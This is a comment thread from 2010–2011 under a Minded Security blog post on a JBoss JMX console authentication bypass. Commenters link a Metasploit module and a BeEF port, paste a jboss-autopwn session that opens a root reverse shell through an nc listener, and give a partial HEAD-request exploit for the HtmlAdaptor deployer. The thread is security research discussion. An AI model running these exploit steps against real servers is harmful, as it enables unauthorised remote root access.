Comments on Minded Security Blog: Good Bye Critical Jboss 0day

The verb tampering security issue in the JMX conso...

2011-10-21T05:16:30.410-07:00

The verb tampering security issue in the JMX console has been ported also to BeEF many months ago (presented at CONFidence May 2011)

http://antisnatchor.com/JBoss_JMX_Deploy_Exploit

Cheers
Michele

A metasploit module now exist to abuse the issue a...

2010-05-11T17:02:09.597-07:00

A metasploit module now exist to abuse the issue as well.

http://www.metasploit.com/redmine/projects/framework/repository/revisions/9285/entry/modules/exploits/multi/http/jboss_deploymentfilerepository.rb

Guys, I have been trying to reproduce this vulnera...

2010-05-10T14:07:39.092-07:00

Guys, I have been trying to reproduce this vulnerability in version 4.0.4 and I haven't had much luck!!! :( Any ideas...???

@Dennis You should ask to the author (Christian Pa...

2010-05-10T00:55:34.271-07:00

@Dennis You should ask to the author (Christian Papathanasiou), we don't know when he'll release it.

is it possible to get a version of jboss-autopwn? ...

2010-05-06T02:53:22.785-07:00

is it possible to get a version of jboss-autopwn? want to test our jboss servers

@Chris: Very happy to see this new addition to jbo...

2010-05-03T07:37:15.181-07:00

@Chris: Very happy to see this new addition to jboss-autopwn! :D

@Frank: We have developed a custom exploit that redirects temporarily the output to Jboss status page, which is not password protected by default. This issue has been fixed with "CVE-2010-1429". During the next few days we will publish it on our website, along with the official advisory.

Got this working with JBoss-autopwn :-D Screensho...

2010-05-03T05:58:12.003-07:00

Got this working with JBoss-autopwn :-D

Screenshot below..

[root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080
[x] Checking if authentication is enabled..
[!] Authentication enabled!
[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass
[!] Is this a *nix based or Windows based JBoss instance? nix
[!] Which IP should I send the reverse shell to? 192.168.1.2
[!] Which port should I send the reverse shell to? 6669
[x] *nix based selected...
Connection from 192.168.1.3 port 6669 [tcp/*] accepted
[!] you should now have a shell on 192.168.1.2:6669
[root@foo jboss-autopwn]# fg 1
nc -lv 6669
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
^C
[root@foo jboss-autopwn]#

Will be testing it some more and sending you guys a copy soon :-)

Christian Papathanasiou.

It works. Anyway I cannot get response output, sin...

2010-04-30T23:55:15.022-07:00

It works. Anyway I cannot get response output, since HEAD method is without response body.

Do you have any hint for issue a command to download JMX-Console configuration files?

Thank you

@Steve Thank you! @Frank just supply the request...

2010-04-30T07:42:14.224-07:00

@Steve Thank you!

@Frank

just supply the request like this:

HEAD
/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployer%3Aserv....
HTTP/1.1

Use GET parameters, not POST ;D should work

Hi guys. We are trying to test the exploit but it...

2010-04-30T07:39:29.945-07:00

Hi guys.

We are trying to test the exploit but it doesn't work; any other hint?

Awesome work Guys! Steve

2010-04-30T07:37:37.488-07:00

Awesome work Guys!

Steve